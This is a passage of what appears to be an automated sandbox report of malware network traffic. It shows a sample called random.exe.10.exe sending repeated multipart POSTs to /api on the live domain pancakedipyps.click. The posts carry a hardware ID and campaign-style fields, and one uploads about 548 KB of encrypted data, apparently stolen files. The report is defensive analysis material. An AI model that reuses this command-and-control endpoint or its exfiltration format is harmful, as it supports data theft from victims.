                                                                                                                              Date: Wed, 18 Dec 2024 12:49:55 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=e521amqm0bfv4af5dl2180nu01; expires=Sun, 13-Apr-2025 06:36:34 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtO4El4aK5E7%2F6GTSSRXF17Yaig%2BjXDM6SgUe35EcG92yr0llGpcA8GCi674msUGp8HPYh9brYffoZ0muo0SefgdmcemD07QeLdE%2B3sJ9%2BWObH1RMgMcR4IBQsANNixr%2FBi67m2T"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f4690fe0bc45c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1537&rtt_var=647&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2849&recv_bytes=15998&delivery_rate=1899804&cwnd=242&unsent_bytes=0&cid=9221216ff372ddc2&ts=943&x=0"
                                                                                                                              2024-12-18 12:49:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                              2024-12-18 12:49:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.949716104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:49:57 UTC278OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: multipart/form-data; boundary=FI5E5W32HIH
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 20536
                                                                                                                              Host: pancakedipyps.click
                                                                                                                              2024-12-18 12:49:57 UTC15331OUTData Raw: 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 46 49 35 45 35 57 33 32 48 49 48 0d 0a 43 6f 6e 74 65
                                                                                                                              Data Ascii: --FI5E5W32HIHContent-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--FI5E5W32HIHContent-Disposition: form-data; name="pid"3--FI5E5W32HIHContent-Disposition: form-data; name="lid"FATE99--test--FI5E5W32HIHConte
                                                                                                                              2024-12-18 12:49:57 UTC5205OUTData Raw: a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: s}Q0u?4E([:s~X`nO
                                                                                                                              2024-12-18 12:49:58 UTC1050INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 18 Dec 2024 12:49:58 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=edd3g5esq6meii4miselk3gqti; expires=Sun, 13-Apr-2025 06:36:37 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pH1oW2Ii%2FoeFBqXQnvCYgro0AKzJdBhxve4wKxAyDPecVEK1NdbvHDRiRTVn%2BqEIL0YbwYhURTVOeva1T3s0kOL9aDqM%2FM2PpzGLJRlmlMH681jSks2%2B941%2BH%2BBRfzrqoT%2BQFRY%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f46a11fbbefa1-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2122&min_rtt=2023&rtt_var=830&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21494&delivery_rate=1443400&cwnd=165&unsent_bytes=0&cid=62eaf3ab8421fabf&ts=895&x=0"
                                                                                                                              2024-12-18 12:49:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                              2024-12-18 12:49:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.949719104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:50:00 UTC282OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: multipart/form-data; boundary=VOGS9FMXKWB6KHV3
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 1207
                                                                                                                              Host: pancakedipyps.click
                                                                                                                              2024-12-18 12:50:00 UTC1207OUTData Raw: 2d 2d 56 4f 47 53 39 46 4d 58 4b 57 42 36 4b 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 4f 47 53 39 46 4d 58 4b 57 42 36 4b 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 4f 47 53 39 46 4d 58 4b 57 42 36 4b 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 56 4f 47
                                                                                                                              Data Ascii: --VOGS9FMXKWB6KHV3Content-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--VOGS9FMXKWB6KHV3Content-Disposition: form-data; name="pid"1--VOGS9FMXKWB6KHV3Content-Disposition: form-data; name="lid"FATE99--test--VOG
                                                                                                                              2024-12-18 12:50:01 UTC1045INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 18 Dec 2024 12:50:01 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=t4rrnl4mrn769eh5bnu7bnlh9d; expires=Sun, 13-Apr-2025 06:36:40 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7zl0kKfvxHZNii5b1UCAi8Q7Gii7B8tl%2BJPSvT7B9dh%2BL%2B26nG8Hzb6Akl%2BIdq2UsE358capTpLdRLVwbZuBFElwfSyYH2o%2BoSF%2BxXX8Ud1x4mXHVlS3aWrG0%2BLXzuT8ccO1LjWm"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f46b3cd0942aa-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1695&rtt_var=657&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2125&delivery_rate=1638608&cwnd=195&unsent_bytes=0&cid=b45482206e363272&ts=783&x=0"
                                                                                                                              2024-12-18 12:50:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                              2024-12-18 12:50:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.949721104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:50:03 UTC280OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: multipart/form-data; boundary=SGY5F9G8KXVC
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 547865
                                                                                                                              Host: pancakedipyps.click
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43
                                                                                                                              Data Ascii: --SGY5F9G8KXVCContent-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--SGY5F9G8KXVCContent-Disposition: form-data; name="pid"1--SGY5F9G8KXVCContent-Disposition: form-data; name="lid"FATE99--test--SGY5F9G8KXVCC
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: e1 a4 45 37 ed 63 76 1f 53 82 6e b7 91 20 45 6a ba 93 c7 75 bc 6a 05 26 70 86 70 f9 b2 fe 05 d1 67 e4 fb 5a 62 ed ba e8 18 15 de ac 8b ca 4e e6 3d f5 d8 8b d1 28 36 fe bb c1 62 22 31 e9 b4 19 ca 22 26 d4 8f d8 6f a0 c5 22 2d 88 a3 6e 70 6d 5d 76 8e 57 dd 5b fb 45 e0 64 07 0e 1c 93 6d 19 13 03 e6 15 28 24 53 71 b6 57 ff fd ad 45 7f 21 4f 66 28 79 d6 99 4e 09 5c 7f a1 8e 02 14 df ad 8f 61 b8 5b 87 21 f0 7a eb e6 86 bf 13 85 03 e8 af 21 78 3f c6 a1 d0 f5 85 3d 12 74 33 57 34 f5 ca 80 3a 08 0d 98 1f 58 e8 d2 0e 11 f5 00 eb 4d fd 52 09 fc b9 b0 79 5b 21 4e 9a 13 ef b7 f0 c5 9b 9a 26 55 ff 57 e3 b4 b0 30 34 27 72 06 f4 ca fc 94 fa 93 40 cb 00 3f 20 8c 60 86 9f 1b fe 5f 7d 59 53 33 02 82 a0 32 61 99 21 47 aa 2d 80 d6 de 5f 05 93 1e 5f b8 03 fb df 30 45 be 91 ef
                                                                                                                              Data Ascii: E7cvSn Ejuj&ppgZbN=(6b"1"&o"-npm]vW[Edm($SqWE!Of(yN\a[!z!x?=t3W4:XMRy[!N&UW04'r@? `_}YS32a!G-__0E
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: 47 15 83 df b4 ef eb 55 93 70 fc 23 9a c1 55 f4 27 ff 08 33 92 41 e0 f8 13 88 a9 24 fa 8f 1c 93 34 56 75 6f a3 bf 9b 46 35 34 da 26 a7 e4 9c 15 b3 aa 37 46 7e 55 91 31 b9 c1 b3 70 f6 62 4b 6a 38 61 fb 17 6c b3 8b c0 77 4f 07 bb 9e 37 e3 d6 6c 91 4b 53 32 1e d0 a4 ef 3d c5 71 47 1b 3a fe 2a 33 e1 bb 03 36 b2 a4 33 ca 23 9a 5e 28 30 2a 9b 7d f7 f7 82 a4 85 fa 61 ea 51 a1 5d 95 48 51 57 08 13 fa a6 dc c7 a5 e4 f9 2e 90 ec 23 7d f1 d7 52 18 84 4d a2 e1 4b 05 a2 47 d9 1d fa 69 ad de 0b 20 9b 58 d0 d0 a0 9f 2d 85 88 93 61 ab 9b 4e a3 a2 b5 3e 77 8c f9 9b c6 51 3a 4b 15 b3 79 be 23 b5 5c a3 d2 c5 07 89 48 86 da dc fd 42 bd 11 84 63 22 bb 45 64 fd 71 d2 19 19 ef b0 03 72 01 f6 10 f8 8d 1f cc 39 eb bd e1 cb ae b4 4d ab ec 8c 42 f3 35 b7 6c 37 6a cf 6d 0f f2 df 9b
                                                                                                                              Data Ascii: GUp#U'3A$4VuoF54&7F~U1pbKj8alwO7lKS2=qG:*363#^(0*}aQ]HQW.#}RMKGi X-aN>wQ:Ky#\HBc"Edqr9MB5l7jm
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: ce 78 49 18 01 60 47 31 ad e3 d4 aa 97 ca 92 b9 e0 87 bf 78 31 0b cf a1 5d dc 4b b1 18 98 ce 7d 30 62 7b 22 10 5a 2b 16 50 3d 49 6e d8 b2 92 03 b7 77 69 15 73 2e df 41 03 da e4 81 92 5b ae 17 20 ae f7 4a 22 98 a5 0b 42 c0 a3 9f ed f3 18 17 50 54 3e 1b c0 f4 c9 f2 ff 36 32 e5 3a b0 dc d3 a5 18 02 4f 60 76 11 95 0e f2 48 12 c1 e9 ac 5e 55 22 ff 2d d0 c5 8b 48 59 9a d6 53 d8 a2 3d 7b ec 1c df c4 b2 28 58 39 2a 65 0d 31 a6 25 40 21 4c ef e5 05 af 0b 05 80 d3 21 3f ea 74 e3 1b fe 89 83 20 9f 40 cb 41 e4 6e ac 8d e5 bb 9f 39 e7 6d 01 c5 b9 fe ae c8 4e 06 06 3e 50 ba 35 c5 aa 04 dc a6 77 b0 90 d0 0e 7f 9d 30 67 06 f6 56 82 26 6a fd a5 2b a7 96 5f e2 e0 4a 4b d7 dd 4c fc b1 1b 54 54 8f 70 8c 04 18 56 62 1c 41 95 a9 aa 6c b4 dc 13 7c 86 84 bb da ac 5c c9 2e e4 b9
                                                                                                                              Data Ascii: xI`G1x1]K}0b{"Z+P=Inwis.A[ J"BPT>62:O`vH^U"-HYS={(X9*e1%@!L!?t @An9mN>P5w0gV&j+_JKLTTpVbAl|\.
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: 21 ba a1 2c c1 98 7d 79 da 07 ee 1f f6 4d 5c 6d c5 aa 4d f3 d2 b9 0f 6c ea bc 9c d5 69 e7 9e 64 07 92 ea 1e 2e eb 85 1b b7 61 1b d6 e9 09 9b 54 7a 45 e2 a2 78 7c 6b 5a 96 7e c2 85 4e 79 28 b9 22 23 aa fa e5 5b 0a db 9a 77 38 33 fe 10 e2 19 96 4e 29 31 5a 4f 50 44 42 1c ec ef 36 de 6a 70 ef 3d e1 c4 fb 57 3e 06 33 aa 74 32 ff ce b1 4c a1 ed 41 87 1a b6 3a 80 7b b9 58 3e 9c 75 40 6b b8 91 f1 b7 d0 98 f4 c1 2c 46 dc e4 dd 97 a2 41 7c bb 2f e6 4f d6 18 28 d2 7e 24 d9 b5 3b e8 82 de 3a bf 79 dd 43 3d 4f af c6 87 14 df b1 c1 05 bd b7 94 3a 4f 14 e4 39 53 85 a4 24 98 e2 fc f9 c7 6b ff ff d0 be 49 b9 99 d2 79 71 e2 49 b3 9e b6 43 65 14 93 f7 1e ae 10 b6 50 88 d9 3e 32 3d 71 f2 43 ca 80 59 15 03 b1 bf 42 a5 b9 04 b8 64 04 44 91 40 40 44 48 a9 f1 bb 54 f4 83 bb c7
                                                                                                                              Data Ascii: !,}yM\mMlid.aTzEx|kZ~Ny("#[w83N)1ZOPDB6jp=W>3t2LA:{X>u@k,FA|/O(~$;:yC=O:O9S$kIyqICeP>2=qCYBdD@@DHT
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: 60 98 a0 da e2 6f 42 15 dc 68 98 7b 68 7a 5f a8 f4 c7 78 bd c7 40 a9 cb dc e7 97 d5 3a 8b a6 e1 c6 53 ab 5e 0f b2 8c 10 de b5 63 58 9b 57 66 70 43 71 0d 3d 35 94 57 0a 10 ae 7d 10 25 e9 0e d6 7e 2f db f2 cf 09 12 63 72 66 53 e9 9b 74 2e 55 fc 5e a6 74 34 e9 a7 88 50 1d 3b 63 60 cb e3 e3 ba bd 78 94 fd b6 1a 80 d8 e5 87 f7 96 d3 a7 d9 c3 df 0b 62 43 24 e6 ce d6 c1 b2 20 98 37 e7 1c 66 e1 ff 28 45 45 c0 fa 89 c1 c0 f3 78 55 59 3f ce 37 73 5b 25 0c 9c 80 0b cb 33 7f 78 6a 8e b5 e9 1f 8f f6 3f 07 bc 4e 21 40 81 17 5c 3c 0a 98 55 61 87 f7 9d 24 e0 3d 53 a0 00 88 eb 90 8f ee b8 6b a6 5c 75 79 6c 6f d0 ab 9c 77 57 e3 c8 b4 95 b3 82 28 51 94 e5 a5 9b 15 cf 1f 45 95 75 bf b5 78 2d 9b 23 3d 0a 72 3c 9a a3 52 aa c8 ff b5 e5 a4 69 41 44 60 ab cb 2f be dd 71 eb dd f9
                                                                                                                              Data Ascii: `oBh{hz_x@:S^cXWfpCq=5W}%~/crfSt.U^t4P;c`xbC$ 7f(EExUY?7s[%3xj?N!@\<Ua$=Sk\uylowW(QEux-#=r<RiAD`/q
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: f1 15 e3 68 20 4b b3 3d 64 ee 6d af 03 29 29 44 06 65 2c 50 94 87 eb aa f5 91 5e b2 d8 5a 45 8b a1 5f cb fa a1 7e 47 c7 aa cf ac 58 7c c8 6e bc 11 28 4c c6 b5 f3 94 11 82 46 6f 17 b4 22 7c d3 e3 2e ee 1a de 0e 9e 0b da 0d 52 5f c9 eb 70 06 1d 51 32 3a 29 fe 90 16 48 bc 1f 4c b9 91 65 69 32 b3 38 76 ae c5 ac 39 90 27 93 64 c4 3a be af e6 90 f0 45 6d e6 fe a5 59 e8 48 d3 9c 79 12 37 92 af af 64 35 15 7f 54 31 22 11 3d 63 74 bf 15 7d 12 e4 be a5 a7 a9 a5 10 ad ad 3e 64 71 9c e5 ad 4a 6b 0a d1 69 23 8c 36 58 19 8d c7 f6 c4 e7 d5 99 0b 4c 9c 0a 98 12 e5 85 c4 ca dd 80 a1 89 df d2 52 3c c1 cf a4 64 5c 1b 7d fd d2 5f 40 26 f0 65 76 ab 6c 43 55 2b 6a 0b ea 42 80 4c 58 24 d5 90 f7 69 a3 a0 f8 1c a7 b2 ff a6 8a 2a 80 c4 6f d0 ac d5 7f 5b 5e 03 38 66 b8 c3 ca 70 f6
                                                                                                                              Data Ascii: h K=dm))De,P^ZE_~GX|n(LFo"|.R_pQ2:)HLei28v9'd:EmYHy7d5T1"=ct}>dqJki#6XLR<d\}_@&evlCU+jBLX$i*o[^8fp
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: 0b 04 9a c7 6b a5 e3 56 e7 d5 58 c3 73 23 1c 0f 95 6b 82 1f 14 1f 85 b0 f5 62 83 99 57 43 f4 bf 93 87 fc 4f 93 0d d2 6f 46 0a 13 ee 7a f5 7e 24 d5 74 f9 33 91 16 20 9a 82 e2 73 20 4f 2b 35 54 e9 63 d4 f4 85 26 c8 a5 0f a2 cd b5 26 68 66 04 c5 ec 2c a9 20 3c aa ef 61 64 29 ba a7 15 5c e8 8d 47 58 f8 08 14 84 d9 75 45 f5 68 91 65 e9 8f 31 17 06 31 43 ca f3 e5 1e 9f 8a ed 18 1c 46 79 26 72 be ad e3 7d 16 f7 ba d2 81 4e 33 ef e8 45 e7 65 9d d7 08 99 07 e6 fb 32 78 6e c1 f9 85 85 a3 07 aa 2f 57 77 ac f1 be 19 57 2d 26 7e c4 e5 32 fb 14 36 ed 7e 78 c2 8c ed 60 74 00 6e 6d 76 8c ba 76 0e 50 83 51 81 0b 11 c1 76 13 99 94 25 b6 4a fe c8 2d 3d e7 f8 90 64 8d e1 89 eb f9 63 67 fa e7 88 75 4a 59 ee 4f 05 75 24 22 9f cf 93 92 04 cf c2 d6 09 39 c5 90 89 e0 25 f4 ce 49
                                                                                                                              Data Ascii: kVXs#kbWCOoFz~$t3 s O+5Tc&&hf, <ad)\GXuEhe11CFy&r}N3Ee2xn/WwW-&~26~x`tnmvvPQv%J-=dcguJYOu$"9%I
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: 47 11 8e 8d 2b 53 8e 63 be db c3 d9 c9 1c 7b 14 c8 76 32 c8 aa 80 ca 0b e8 b6 0c 9f 67 45 08 12 cd 8c 66 d4 8f e0 f9 18 4f 9d d6 22 f5 d8 02 a2 20 6a 2f 5f 4b 6e d1 97 03 71 bd 2b f2 8f 57 9b fe c1 b5 2e ab 0d 14 fb 91 d1 91 a5 8a 7f e7 c2 98 0c 6e c0 61 a3 9f c6 06 fd 82 39 57 8a 11 f0 fb 85 82 cb af 78 b1 f2 39 40 c9 75 a3 93 21 d7 b0 37 57 5f 95 c2 85 df 1e d6 22 68 a5 f0 1b 9e 1e de 0b 14 fe 3c a4 fa 00 7a 63 3c fc 58 1a 28 5c c1 1a 3a 82 5c 4a a1 a2 90 10 a9 68 8a fd e1 1a 68 8f a6 1d 3a 0b f5 ed 7d 5a 97 c8 e7 f1 8f ba ee da 15 fb 2e 2c de 59 7a 1c 7d fe 6a 76 ab 48 ac 1e be c6 4b 7d 47 94 0e 91 e2 2c 80 2c 0c 7d 01 a1 df 9e fe fb 4c 54 5f f0 bf 67 27 8a bb 48 ad 7c 5b 56 8a 41 51 c6 e1 76 04 09 ae d9 45 ed fa fb 56 b4 2d 34 ff 85 04 c7 4a 91 1a 81
                                                                                                                              Data Ascii: G+Sc{v2gEfO" j/_Knq+W.na9Wx9@u!7W_"h<zc<X(\:\Jhh:}Z.,Yz}jvHK}G,,}LT_g'H|[VAQvEV-4J
                                                                                                                              2024-12-18 12:50:03 UTC15331OUTData Raw: fc 78 48 0d e0 ee e5 91 fa 67 35 3b da fb 2e ff 13 ef 88 61 dd f6 8f 0f 81 83 1b e2 97 f1 8b ce b8 8d 02 06 58 0c 7b 25 b8 b8 9d a7 ad a4 03 20 4e 15 26 50 79 31 65 9e 6b 18 cc 88 4f af 1c ae a9 5c 7c 06 fd 1a 0c 9b 3b 12 3c 57 bb 50 76 19 53 e0 af c7 70 9d b9 14 86 37 f4 28 34 18 1c 70 71 f5 f7 27 ae 47 3f 5e 5e da 3e 98 9f 6c 3a 3b 4e fd ed f5 d9 a4 63 50 d9 7f fe 12 0e 50 df df 8e 4f ac dc c8 7a 5b 89 49 0a 33 fe e0 e9 f1 61 e4 bb 6d 85 f0 ed 60 dc 0b 82 09 fb fc 50 c2 43 a8 99 8a df 3c a5 9e 8b 4f a1 d8 3d ab 7d bc 2c 44 ab bd 32 de f2 b0 16 ca a5 25 03 ca 9b 1d 9b 3d 6e d3 f7 dc 70 7d 1e f3 59 1b 42 7f 03 31 0e ed cb 51 0c ca 61 d5 5e 5e 19 5c 6d 79 40 2f 95 3b 4f e8 76 a5 f7 4c 7b 83 80 18 14 3c d7 9a 1c 00 7a 8e 25 22 0c 9a 62 86 e5 4e 9c ba 54 2d
                                                                                                                              Data Ascii: xHg5;.aX{% N&Py1ekO\|;<WPvSp7(4pq'G?^^>l:;NcPPOz[I3am`PC<O=},D2%=np}YB1Qa^^\my@/;OvL{<z%"bNT-
                                                                                                                              2024-12-18 12:50:07 UTC1043INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 18 Dec 2024 12:50:07 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Set-Cookie: PHPSESSID=c1lde4hn7i1gk845tjqgeqi8vq; expires=Sun, 13-Apr-2025 06:36:44 GMT; Max-Age=9999999; path=/
                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x48glV1u4MrzUA5jS5%2Fv5qjvyBBhfLSr4qvOvGEdI2rvMN74HnCMDzKONZG3OLd7I%2FdU6cNkQeZfFvAO2ZtrJ8xHSH0oLVoXcZWyIA1OdsyBA0HCSEpcWxgFdoLSQIElMQn2zdYe"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f3f46c3faa48c3c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3110&min_rtt=1975&rtt_var=1552&sent=196&recv=565&lost=0&retrans=0&sent_bytes=2848&recv_bytes=550343&delivery_rate=1478481&cwnd=224&unsent_bytes=0&cid=8de9f7807eccef16&ts=4597&x=0"


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.949723104.21.23.764437908C:\Users\user\Desktop\random.exe.10.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-18 12:50:09 UTC267OUTPOST /api HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                              Content-Length: 81
                                                                                                                              Host: pancakedipyps.click
